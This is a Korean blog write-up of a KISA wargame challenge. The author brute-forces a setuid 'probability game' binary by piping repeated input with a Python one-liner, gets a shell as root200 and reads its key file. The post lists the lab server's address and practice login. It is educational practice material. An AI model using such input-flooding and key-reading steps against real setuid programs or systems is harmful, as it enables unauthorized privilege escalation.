티스토리 뷰
##################################################
문제 제목 : 확률 게임에서 이겨라!
문제 설명 : 확률 게임이 있다. 이 게임은 1에서
100중 숫자를 선택하여 컴퓨터가 선택한 값과 일치
해야 된다. 일치하면 잭팟이 터지고 SHELL을 획득
할 수 있다. 게임에서 이겨라!
접근 IP : 175.119.227.56
접근 PORT : 10222
접근ID : system200
접근 PW : securitypractice
##################################################
설명만 본다면 단순한 확률게임인것 같다.
서버에 접속해보면 역시 system200이라는 파일이 있다.
-bash-4.1$ ll
total 16
-r-sr-x--- 1 root200 system200 9424 Apr 7 2014 system200
-bash-4.1$ ./system200
Probability Game ------------------------+
- Goal : JackPot!!!
- Menu Choice
(1) Game Start.
(2) User Name Change.
(3) Exit
-----------------------------------------+
INPUT - 1
-----------------------------------------------------------
-Game Method : If a number inputed from 1 to 100, print "JackPot"
-----------------------------------------------------------
Enter the Number ( 1~100 ) :50
Failed...
역시 단순하게 계속해서 루프를 도는 형식이다. 틀리면 Failed를 출력하고 다시 첫번째 화면이 나온다.
그렇다면 그냥 계속해서 반복해야 한다는 것인데, 손으로 하면 너무 힘드니 반복시키는 프로그램을 만들거나 python을 이용하도록 하자.
또한 1을 친 후에 Enter를 눌러야 한다. Enter는 \x0a이다.
-bash-4.1$ (python -c 'print "1"';cat) | ./system200
Probability Game ------------------------+
- Goal : JackPot!!!
- Menu Choice
(1) Game Start.
(2) User Name Change.
(3) Exit
-----------------------------------------+
INPUT - -----------------------------------------------------------
-Game Method : If a number inputed from 1 to 100, print "JackPot"
-----------------------------------------------------------
1을 넣어주게 되면 첫번째 단계가 스킵된다. 스킵된거 같아 보이지만 1이 정상적으로 입력된 것이다.
(여기서는 \x0a를 넣어주지 않았지만 두개 이상이 되면 넣어주어야 한다.)
그렇다면 Enter도 넣고 반복되게 해보자.
( python -c 'print ("1" + "\x0a") * 1000' ; cat ) | ./system200
.......
...
....( 생략 )
Enter the Number ( 1~100 ) :Failed...
Probability Game ------------------------+
- Goal : JackPot!!!
- Menu Choice
(1) Game Start.
(2) User Name Change.
(3) Exit
-----------------------------------------+
INPUT - -----------------------------------------------------------
-Game Method : If a number inputed from 1 to 100, print "JackPot"
-----------------------------------------------------------
Enter the Number ( 1~100 ) :!Conguraturation !!!
id
uid=503(root200) gid=501(system200) groups=503(root200),501(system200)
whoami
root200
ls /home/root200
k root200_key
cat /home/root200/root200_key
????????????????????????
( 중간에 한번 멈추는 것 같으니 아무거나 쳐서 이어주자 )
문제 해결 확인
'Pwnable > KISA SYSTEM' 카테고리의 다른 글
Basic Format String1 (3) | 2014.10.12 |
---|---|
취약한 메아리 프로그램 (1) | 2014.10.12 |